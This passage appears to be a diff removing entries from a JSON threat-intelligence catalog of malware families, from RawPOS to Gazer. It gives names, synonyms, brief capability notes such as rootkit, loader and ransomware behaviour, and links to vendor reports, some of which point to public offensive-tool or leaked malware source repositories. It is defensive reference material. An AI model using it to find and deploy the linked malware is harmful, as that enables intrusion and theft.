"https://www.threatconnect.com/blog/threatconnect-discovers-chinese-apt-activity-in-europe/" - ] - } - }, - { - "uuid": "80f87001-ff40-4e33-bd12-12ed1a92d1d7", - "value": "RawPOS", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://blog.trendmicro.com/trendlabs-security-intelligence/rawpos-new-behavior-risks-identity-theft/?platform=hootsuite" - ] - } - }, - { - "uuid": "25c962c5-5616-4fe3-ad44-68c4ac4c726d", - "value": "OpBlockBuster", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://researchcenter.paloaltonetworks.com/2017/04/unit42-the-blockbuster-sequel/" - ] - } - }, - { - "uuid": "d3e16d46-e436-4757-b962-6fd393056415", - "value": "Apocalipto", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.visakorea.com/dam/VCOM/download/merchants/Grocery_Malware_04242013.pdf" - ] - } - }, - { - "uuid": "1ed36f9a-ae00-4d16-bbf7-e97217385fb1", - "value": "AdamLocker", - "description": "Adam Locker (detected as RANSOM_ADAMLOCK.A) is a ransomware that encrypts targeted files on a victim’s system but offers them a free decryption key which can be accessed through Adf.ly, a URL shortening and advertising service.", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-recap-dec-19-dec-31-2016", - "https://twitter.com/JaromirHorejsi/status/813712587997249536" - ] - } - }, - { - "uuid": "16dcc67b-4415-4620-818d-7ca24a5ccaf5", - "value": "RokRAT", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/002/191/original/Talos_RokRatWhitePaper.pdf", - "http://blog.talosintelligence.com/2017/04/introducing-rokrat.html", - "http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html", - "http://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html", - "https://www.youtube.com/watch?v=uoBQE5s2ba4", - "https://www.carbonblack.com/2018/02/27/threat-analysis-rokrat-malware/" - ] - } - }, - { - "uuid": "3482f5fe-f129-4c77-ae98-76e25f6086b9", - "value": "Viper RAT", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securelist.com/blog/incidents/77562/breaking-the-weakest-link-of-the-strongest-chain/", - "https://blog.lookout.com/blog/2017/02/16/viperrat-mobile-apt/" - ] - } - }, - { - "uuid": "15094548-7555-43ee-8c0d-4557d6d8a087", - "value": "WebC2-Kt3", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf" - ] - } - }, - { - "uuid": "b749ff3a-df68-4b38-91f1-649864eae52c", - "value": "Pirrit", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://www.zdnet.com/article/maker-of-sneaky-mac-adware-sends-security-researcher-cease-and-desist-letter/", - "http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdf" - ] - } - }, - { - "uuid": "32b95dc7-03a6-45ab-a991-466208dd92d2", - "value": "Xaynnalc", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://twitter.com/michalmalik/status/846368624147353601" - ] - } - }, - { - "uuid": "5f638985-49e1-4059-b2eb-f2ffa397b212", - "value": "Conficker", - "description": "", - "meta": { - "synonyms": [ - "traffic converter", - "downadup" - ], - "type": [], - "refs": [ - "http://contagiodump.blogspot.com/2009/05/win32conficker.html" - ] - } - }, - { - "uuid": "bee73d0f-8ff3-44ba-91dc-d883884c754e", - "value": "Acronym", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.arbornetworks.com/blog/asert/acronym-m-is-for-malware/" - ] - } - }, - { - "uuid": "ac75d0a3-bb99-4453-9567-a6c8ba87a706", - "value": "Credraptor", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/" - ] - } - }, - { - "uuid": "713d8ec4-4983-4fbb-827c-2ef5bc0e6930", - "value": "Dockster", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://contagiodump.blogspot.com/2012/12/osxdockstera-and-win32trojanagentaxmo.html", - "https://www.f-secure.com/weblog/archives/00002466.html" - ] - } - }, - { - "uuid": "74f8db32-799c-41e5-9815-6272908ede57", - "value": "MS Exchange Tool", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://github.com/nccgroup/Royal_APT", - "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/" - ] - } - }, - { - "uuid": "fc91803f-610c-4ad5-ba0c-b78d65abc6db", - "value": "Darktrack RAT", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://news.softpedia.com/news/free-darktrack-rat-has-the-potential-of-being-the-best-rat-on-the-market-508179.shtml", - "https://nioguard.blogspot.de/2017/05/targeted-attack-against-ukrainian.html" - ] - } - }, - { - "uuid": "f5cabe73-b5d6-4503-8350-30a6d54c32ef", - "value": "Raxir", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://twitter.com/PhysicalDrive0/statuses/798825019316916224" - ] - } - }, - { - "uuid": "faa2196f-df4c-454c-995e-ded7864d5fa8", - "value": "Stabuniq", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://contagiodump.blogspot.com/2012/12/dec-2012-trojanstabuniq-samples.html", - "https://www.symantec.com/connect/blogs/trojanstabuniq-found-financial-institution-servers" - ] - } - }, - { - "uuid": "892cb6c2-b96c-4f77-a9cf-4dd3d0c1cc40", - "value": "WMI Ghost", - "description": "", - "meta": { - "synonyms": [ - "Wimmie", - "Syndicasec" - ], - "type": [], - "refs": [ - "https://secrary.com/ReversingMalware/WMIGhost/", - "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets" - ] - } - }, - { - "uuid": "8c246ec4-eaa5-42c0-b137-29f28cbb6832", - "value": "Carbanak", - "description": "", - "meta": { - "synonyms": [ - "Anunak" - ], - "type": [], - "refs": [ - "https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html", - "https://www.fox-it.com/en/wp-content/uploads/sites/11/Anunak_APT-against-financial-institutions2.pdf", - "https://securelist.com/files/2015/02/Carbanak_APT_eng.pdf" - ] - } - }, - { - "uuid": "6363cc2f-08f1-47a0-adbf-5cf19ea89ffd", - "value": "MM Core", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blogs.forcepoint.com/security-labs/mm-core-memory-backdoor-returns-bigboss-and-sillygoose" - ] - } - }, - { - "uuid": "3ec67717-acd5-401b-8e9f-47e79edd07a0", - "value": "CryptoLuck", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://www.bleepingcomputer.com/news/security/cryptoluck-ransomware-being-malvertised-via-rig-e-exploit-kits/" - ] - } - }, - { - "uuid": "1cc9d450-88cd-435c-bb74-8410d2d22571", - "value": "YoungLotus", - "description": "Simple malware with proxy/RDP and download capabilities. It often comes bundled with installers, in particular in the Chinese realm.\r\n\r\nPE timestamps suggest that it came into existence in the second half of 2014.\r\n\r\nSome versions perform checks of the status of the internet connection (InternetGetConnectedState: MODEM, LAN, PROXY), some versions perform simple AV process-checks (CreateToolhelp32Snapshot).\r\n", - "meta": { - "synonyms": [ - "DarkShare" - ], - "type": [], - "refs": [ - "https://www.youtube.com/watch?v=AUGxYhE_CUY" - ] - } - }, - { - "uuid": "09b555be-8bac-44b2-8741-922ee0b87880", - "value": "Satana", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.cylance.com/threat-spotlight-satan-raas" - ] - } - }, - { - "uuid": "6201c337-1599-4ced-be9e-651a624c20be", - "value": "GhostAdmin", - "description": "", - "meta": { - "synonyms": [ - "Ghost iBot" - ], - "type": [], - "refs": [ - "https://www.bleepingcomputer.com/news/security/new-ghostadmin-malware-used-for-data-theft-and-exfiltration/", - "https://www.cylance.com/en_us/blog/threat-spotlight-ghostadmin.html" - ] - } - }, - { - "uuid": "fb3a8164-d8cb-495d-9b1c-57bed00c21ed", - "value": "XBTL", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "e186384b-8001-4cdd-b170-1548deb8bf04", - "value": "SpyBanker", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://news.drweb.com/show/?i=11104&lng=en", - "http://www.welivesecurity.com/2017/02/23/released-android-malware-source-code-used-run-banking-botnet/" - ] - } - }, - { - "uuid": "591b2882-65ba-4629-9008-51ed3467510a", - "value": "Gaudox", - "description": "Gaudox is a http loader, written in C/C++. The author claims to have put much effort into making this bot efficient and stable. Its rootkit functionality hides it in Windows Explorer (32bit only).", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://nettoolz.blogspot.ch/2016/03/gaudox-http-bot-1101-casm-ring3-rootkit.html" - ] - } - }, - { - "uuid": "91191c0a-96d8-40b8-b8fb-daa0ad009c87", - "value": "NgrBot", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securingtomorrow.mcafee.com/mcafee-labs/ngrbot-spreads-via-chat/", - "https://research.checkpoint.com/dorkbot-an-investigation/", - "http://stopmalvertising.com/rootkits/analysis-of-ngrbot.html" - ] - } - }, - { - "uuid": "bc128d41-33e6-40ec-aaf2-9a05da9a0a27", - "value": "ASPC", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "9afa9b7e-e2c1-4725-8d8d-cec7933cc63b", - "value": "CookieBag", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf" - ] - } - }, - { - "uuid": "0646a6eb-1c13-4d87-878e-9431314597bf", - "value": "Snojan", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://medium.com/@jacob16682/snojan-analysis-bb3982fb1bb9" - ] - } - }, - { - "uuid": "26b91007-a8ae-4e32-bd99-292e44735c3d", - "value": "Smominru", - "description": "", - "meta": { - "synonyms": [ - "Ismo" - ], - "type": [], - "refs": [ - "https://www.proofpoint.com/us/threat-insight/post/smominru-monero-mining-botnet-making-millions-operators", - "http://blog.netlab.360.com/mykings-the-botnet-behind-multiple-active-spreading-botnets/" - ] - } - }, - { - "uuid": "5060756f-8385-465d-a7dd-7bf09a54da92", - "value": "Alphabet Ransomware", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://twitter.com/JaromirHorejsi/status/813714602466877440" - ] - } - }, - { - "uuid": "cd397973-8f42-4c49-8322-414ea77ec773", - "value": "Olyx", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://contagiodump.blogspot.com/2011/07/jul-25-mac-olyx-gh0st-backdoor-in-rar.html", - "https://news.drweb.com/show/?i=1750&lng=en&c=14" - ] - } - }, - { - "uuid": "3b5faa15-e87e-4aaf-b791-2c5e593793e6", - "value": "Koadic", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/", - "https://github.com/zerosum0x0/koadic" - ] - } - }, - { - "uuid": "51f53823-d289-4176-af45-3fca7eda824b", - "value": "Ramdo", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "6be9eee4-ee99-4ad6-bee3-2365d7b37a88", - "value": "RedAlpha", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.recordedfuture.com/redalpha-cyber-campaigns/" - ] - } - }, - { - "uuid": "77c20bd9-5403-4f99-bae5-c54f3f38a6b6", - "value": "Shujin", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://www.nyxbone.com/malware/chineseRansom.html", - "https://blog.trendmicro.com/trendlabs-security-intelligence/chinese-language-ransomware-makes-appearance/" - ] - } - }, - { - "uuid": "c0e8b64c-bd2c-4a3e-addc-0ed6cc1ba200", - "value": "yty", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.arbornetworks.com/blog/asert/donot-team-leverages-new-modular-malware-framework-south-asia/" - ] - } - }, - { - "uuid": "4cfa42a3-71d9-43e2-bf23-daa79f326387", - "value": "Xbot", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blog.avast.com/2015/02/17/angry-android-hacker-hides-xbot-malware-in-popular-application-icons/", - "https://researchcenter.paloaltonetworks.com/2016/02/new-android-trojan-xbot-phishes-credit-cards-and-bank-accounts-encrypts-devices-for-ransom/" - ] - } - }, - { - "uuid": "d1150a1a-a2f4-4954-b22a-a85b7876408e", - "value": "WMImplant", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.fireeye.com/blog/threat-research/2017/03/wmimplant_a_wmi_ba.html" - ] - } - }, - { - "uuid": "b7f1abd3-870b-42ca-9bd1-5931126c68d5", - "value": "HyperBro", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securelist.com/luckymouse-hits-national-data-center/86083/" - ] - } - }, - { - "uuid": "aaeaf9ee-2f3d-4141-9d45-ec383ba8445f", - "value": "Mole", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.proofpoint.com/us/threat-insight/post/adgholas-malvertising-campaign-using-astrum-ek-deliver-mole-ransomware", - "https://www.cert.pl/en/news/single/mole-ransomware-analysis-and-decryptor/" - ] - } - }, - { - "uuid": "e1410684-c695-4c89-ae5f-80ced136afbd", - "value": "Gh0stnet", - "description": "", - "meta": { - "synonyms": [ - "Remosh" - ], - "type": [], - "refs": [ - "https://en.wikipedia.org/wiki/GhostNet", - "http://contagiodump.blogspot.com/2011/07/jul-25-mac-olyx-gh0st-backdoor-in-rar.html" - ] - } - }, - { - "uuid": "ddf63295-cdba-4c70-a4c6-623ba2b5e6dd", - "value": "Nabucur", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "a70e93a7-3578-47e1-9926-0818979ed866", - "value": "RedLeaves", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://blog.jpcert.or.jp/.s/2017/04/redleaves---malware-based-on-open-source-rat.html", - "https://www.accenture.com/t20180423T055005Z__w__/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf", - "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", - "http://blog.macnica.net/blog/2017/12/post-8c22.html", - "https://github.com/nccgroup/Cyber-Defence/tree/master/Technical%20Notes/Red%20Leaves", - "https://www.jpcert.or.jp/magazine/acreport-redleaves.html" - ] - } - }, - { - "uuid": "d84ebd91-58f6-459f-96a1-d028a1719914", - "value": "WellMess", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blog.jpcert.or.jp/2018/07/malware-wellmes-9b78.html" - ] - } - }, - { - "uuid": "258751c7-1ddb-4df6-9a17-36b08c2cb267", - "value": "Woolger", - "description": "", - "meta": { - "synonyms": [ - "WoolenLogger" - ], - "type": [], - "refs": [ - "http://www.trendmicro.it/media/wp/operation-woolen-goldfish-whitepaper-en.pdf", - "https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf" - ] - } - }, - { - "uuid": "d7196f6a-757b-4124-ae28-f403e5d84fcb", - "value": "GoldenEye", - "description": "", - "meta": { - "synonyms": [ - "Petya/Mischa" - ], - "type": [], - "refs": [ - "https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/", - "https://blog.malwarebytes.com/threat-analysis/2016/12/goldeneye-ransomware-the-petyamischa-combo-rebranded/", - "http://www.threatgeek.com/2017/02/spying-on-goldeneye-ransomware.html" - ] - } - }, - { - "uuid": "80acc956-d418-42e3-bddf-078695a01289", - "value": "Dok", - "description": "", - "meta": { - "synonyms": [ - "Retefe" - ], - "type": [], - "refs": [ - "http://blog.checkpoint.com/2017/04/27/osx-malware-catching-wants-read-https-traffic/", - "https://www.govcert.admin.ch/blog/33/the-retefe-saga", - "http://www.brycampbell.co.uk/new-blog/2017/4/30/retefe-and-osxdok-one-and-the-same", - "https://blog.checkpoint.com/2017/07/13/osxdok-refuses-go-away-money/" - ] - } - }, - { - "uuid": "a396a0bb-6dc5-424a-bdbd-f8ba808ca2c2", - "value": "SynAck", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securelist.com/synack-targeted-ransomware-uses-the-doppelganging-technique/85431/" - ] - } - }, - { - "uuid": "5f9ba149-100a-46eb-a959-0645d872975b", - "value": "XPCTRA", - "description": "Incorporates code of Quasar RAT.", - "meta": { - "synonyms": [ - "Expectra" - ], - "type": [], - "refs": [ - "https://isc.sans.edu/forums/diary/XPCTRA+Malware+Steals+Banking+and+Digital+Wallet+Users+Credentials/22868/", - "https://www.buguroo.com/en/blog/bank-malware-in-brazil-xpctra-rat-analysis" - ] - } - }, - { - "uuid": "6f155c95-3090-4730-8d3b-0b246162a83a", - "value": "GetMail", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf" - ] - } - }, - { - "uuid": "48f95941-8369-4f80-b2b4-abbacd4bc411", - "value": "NewPosThings", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blog.trendmicro.com/trendlabs-security-intelligence/newposthings-has-new-pos-things/", - "https://www.fireeye.com/blog/threat-research/2016/04/multigrain_pointo.html", - "https://asert.arbornetworks.com/lets-talk-about-newposthings/", - "http://www.cyintanalysis.com/a-quick-look-at-a-likely-newposthings-sample/" - ] - } - }, - { - "uuid": "ea06f87c-148c-49e5-afec-7012cb2b4f0a", - "value": "BKA Trojaner", - "description": "BKA Trojaner is a screenlocker ransomware that was active in 2011, displaying a police-themed message in German language.", - "meta": { - "synonyms": [ - "bwin3_bka" - ], - "type": [], - "refs": [ - "https://www.evild3ad.com/405/bka-trojaner-ransomware/" - ] - } - }, - { - "uuid": "a0899fec-161d-4ba8-9594-8b5620c21705", - "value": "Prilex", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.kaspersky.com/blog/chip-n-pin-cloning/21502", - "https://blog.trendmicro.com/trendlabs-security-intelligence/dissecting-prilex-cutlet-maker-atm-malware-families/" - ] - } - }, - { - "uuid": "fbed27da-551d-4793-ba7e-128256326909", - "value": "BravoNC", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group" - ] - } - }, - { - "uuid": "910c3fd2-56e5-4f1d-8df0-2aa0b293b7d9", - "value": "Jigsaw", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "a954e642-4cf4-4293-a4b0-c82cf2db785d", - "value": "Neutrino POS", - "description": "", - "meta": { - "synonyms": [ - "Jimmy" - ], - "type": [], - "refs": [ - "https://securelist.com/neutrino-modification-for-pos-terminals/78839/", - "https://securelist.com/jimmy-nukebot-from-neutrino-with-love/81667/" - ] - } - }, - { - "uuid": "c57a4168-cd09-4611-a665-bbcede80f42b", - "value": "Monero Miner", - "description": "", - "meta": { - "synonyms": [ - "CoinMiner" - ], - "type": [], - "refs": [ - "https://www.welivesecurity.com/2017/09/28/monero-money-mining-malware/" - ] - } - }, - { - "uuid": "9cfdc3ea-c838-4ac5-bff2-57c92ec24b48", - "value": "Godzilla Loader", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=4349&p=28427#p28346" - ] - } - }, - { - "uuid": "e88eb9b1-dc8b-4696-8dcf-0c29924d0f8b", - "value": "Sakula RAT", - "description": "Sakula / Sakurel is a trojan horse that opens a back door and downloads potentially malicious files onto the compromised computer.", - "meta": { - "synonyms": [ - "Sakurel" - ], - "type": [], - "refs": [ - "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2016/june/sakula-an-adventure-in-dll-planting/?page=1", - "https://www.symantec.com/security_response/writeup.jsp?docid=2014-022401-3212-99", - "https://github.com/nccgroup/Cyber-Defence/tree/master/Technical%20Notes/Sakula", - "https://www.secureworks.com/research/sakula-malware-family" - ] - } - }, - { - "uuid": "f716681e-c1fd-439a-83aa-3147bb9f082f", - "value": "Unidentified 033", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "7f3794fc-662e-4dde-b793-49bcaccc96f7", - "value": "WSO", - "description": "", - "meta": { - "synonyms": [ - "Webshell by Orb" - ], - "type": [], - "refs": [ - "https://github.com/wso-shell", - "https://securelist.com/energetic-bear-crouching-yeti/85345/" - ] - } - }, - { - "uuid": "4038c3bc-b559-45bb-bac1-9665a54dedf9", - "value": "Bahamut", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.bellingcat.com/news/mena/2017/06/12/bahamut-pursuing-cyber-espionage-actor-middle-east/", - "https://www.bellingcat.com/resources/case-studies/2017/10/27/bahamut-revisited-cyber-espionage-middle-east-south-asia/" - ] - } - }, - { - "uuid": "f86b675a-b7b2-4a40-b4fd-f62fd96440f1", - "value": "Freenki Loader", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://researchcenter.paloaltonetworks.com/2017/10/unit42-freemilk-highly-targeted-spear-phishing-campaign/", - "http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html" - ] - } - }, - { - "uuid": "f7674d06-450a-4150-9180-afef94cce53c", - "value": "KokoKrypt", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://twitter.com/struppigel/status/812726545173401600" - ] - } - }, - { - "uuid": "f3ba8a50-0105-4aa9-90b2-01df15f50b28", - "value": "Olympic Destroyer", - "description": "Malware which seems to have no function other than to disrupt computer systems related to the 2018 Winter Olympic event.", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://blog.talosintelligence.com/2018/02/olympic-destroyer.html", - "https://www.lastline.com/labsblog/olympic-destroyer-south-korea/", - "https://securelist.com/the-devils-in-the-rich-header/84348/", - "https://cyber.wtf/2018/03/28/dissecting-olympic-destroyer-a-walk-through/", - "https://securelist.com/olympic-destroyer-is-still-alive/86169/", - "http://blog.talosintelligence.com/2018/02/who-wasnt-responsible-for-olympic.html", - "https://www.lastline.com/labsblog/attribution-from-russia-with-code/", - "https://securelist.com/olympicdestroyer-is-here-to-trick-the-industry/84295/" - ] - } - }, - { - "uuid": "aea21616-061d-4177-9512-8887853394ed", - "value": "StegoLoader", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.secureworks.com/research/stegoloader-a-stealthy-information-stealer" - ] - } - }, - { - "uuid": "18419355-fd28-41a6-bffe-2df68a7166c4", - "value": "FlawedAmmyy", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://github.com/Coldzer0/Ammyy-v3", - "https://secrary.com/ReversingMalware/AMMY_RAT_Downloader/", - "https://www.proofpoint.com/us/threat-insight/post/leaked-source-code-ammyy-admin-turned-flawedammyy-rat" - ] - } - }, - { - "uuid": "6703e8ce-2c5e-4a9d-96b4-49e90074b043", - "value": "Rikamanu", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets" - ] - } - }, - { - "uuid": "225fa6cf-dc9c-4b86-873b-cdf1d9dd3738", - "value": "Ghost RAT", - "description": "", - "meta": { - "synonyms": [ - "PCRat", - "Gh0st RAT" - ], - "type": [], - "refs": [ - "https://labs.bitdefender.com/2018/02/operation-pzchao-a-possible-return-of-the-iron-tiger-apt/", - "http://download01.norman.no/documents/ThemanyfacesofGh0stRat.pdf", - "https://www.proofpoint.com/us/threat-insight/post/north-korea-bitten-bitcoin-bug-financially-motivated-campaigns-reveal-new", - "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf", - "http://www.malware-traffic-analysis.net/2018/01/04/index.html", - "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/april/decoding-network-data-from-a-gh0st-rat-variant/", - "https://blog.cylance.com/the-ghost-dragon" - ] - } - }, - { - "uuid": "97c1524a-c052-49d1-8770-14b513d8a830", - "value": "Unidentified 039", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "fe1d51d8-f0e8-4f71-bf5c-724f7d4a824c", - "value": "CabArt", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "19d71f38-422c-48f4-9f90-867eb4d4182e", - "value": "Pkybot", - "description": "Pkybot is a trojan, which has its roots as a downloader dubbed Bublik in 2013 and was seen distributing GameoverZeus in 2014 (ref: fortinet). In the beginning of 2015, webinject capability was added according to /Kleissner/Kafeine/iSight using the infamous ATS.", - "meta": { - "synonyms": [ - "Pykbot", - "TBag", - "Bublik" - ], - "type": [], - "refs": [ - "http://blog.kleissner.org/?p=788", - "https://blog.fortinet.com/2014/05/29/bublik-downloader-evolution", - "http://webcache.googleusercontent.com/search?q=cache:JN3yRXXuYsYJ:https://www.arbornetworks.com/blog/asert/peeking-at-pkybot" - ] - } - }, - { - "uuid": "8a1b1c99-c149-4339-9058-db3b4084cdcd", - "value": "Kitmos", - "description": "", - "meta": { - "synonyms": [ - "KitM" - ], - "type": [], - "refs": [ - "https://www.f-secure.com/weblog/archives/00002558.html" - ] - } - }, - { - "uuid": "8f5ce8a6-c5fe-4c62-b25b-6ce0f3b724c5", - "value": "Dimnie", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/" - ] - } - }, - { - "uuid": "15b85bac-c58b-41fd-8332-cfac7c445e0d", - "value": "RatabankaPOS", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://blog.trex.re.kr/3", - "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf" - ] - } - }, - { - "uuid": "49639ff5-e0be-4b6a-850b-d5d8dd37e62b", - "value": "Rex", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://rednaga.io/2016/09/21/reversing_go_binaries_like_a_pro/", - "https://thisissecurity.net/2016/10/28/octopus-rex-evolution-of-a-multi-task-botnet/" - ] - } - }, - { - "uuid": "0fb57d46-1c4f-49a3-80c2-05bcaa34ec1b", - "value": "BlackShades", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blog.malwarebytes.com/threat-analysis/2014/05/taking-off-the-blackshades/", - "https://blog.malwarebytes.com/threat-analysis/2012/06/blackshades-in-syria/", - "http://contagiodump.blogspot.com/2012/06/rat-samples-from-syrian-targeted.html", - "https://blog.malwarebytes.com/threat-analysis/2012/06/you-dirty-rat-part-2-blackshades-net/" - ] - } - }, - { - "uuid": "ec9b2bf4-1c0b-4f3c-aaa6-909b19503eed", - "value": "MyKings Spreader", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.proofpoint.com/us/threat-insight/post/smominru-monero-mining-botnet-making-millions-operators", - "http://blog.netlab.360.com/mykings-the-botnet-behind-multiple-active-spreading-botnets/" - ] - } - }, - { - "uuid": "06929ad3-2a00-4212-b171-9ecb5f956af5", - "value": "Rapid Ransom", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://twitter.com/malwrhunterteam/status/997748495888076800", - "https://twitter.com/malwrhunterteam/status/977275481765613569" - ] - } - }, - { - "uuid": "17e12216-a303-4a00-8283-d3fe92d0934c", - "value": "Mirai", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securelist.com/blog/research/77621/newish-mirai-spreader-poses-new-risks/", - "https://www.incapsula.com/blog/new-mirai-variant-ddos-us-college.html", - "https://twitter.com/PhysicalDrive0/status/830070569202749440" - ] - } - }, - { - "uuid": "e717a26d-17aa-4cd7-88de-dc75aa365232", - "value": "SyncCrypt", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.bleepingcomputer.com/news/security/synccrypt-ransomware-hides-inside-jpg-files-appends-kk-extension/" - ] - } - }, - { - "uuid": "64f5ae85-1324-43de-ba3a-063785567be0", - "value": "WebC2-Ausov", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf" - ] - } - }, - { - "uuid": "5371bc44-dc07-4992-a3d7-c21705c50ac4", - "value": "WebC2-Cson", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf" - ] - } - }, - { - "uuid": "0a3047b3-6a38-48ff-8f9c-49a5c28e3ada", - "value": "Gazer", - "description": "", - "meta": { - "synonyms": [ - "WhiteBear" - ], - "type": [], - "refs": [ - "https://www.welivesecurity.com/2017/08/30/eset-research-cyberespionage-gazer/", - "https://securelist.com/introducing-whitebear/81638/", - "https://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf", - "https://github.com/eset/malware-ioc/tree/master/turla" - ] - } - }, - { - "uuid": 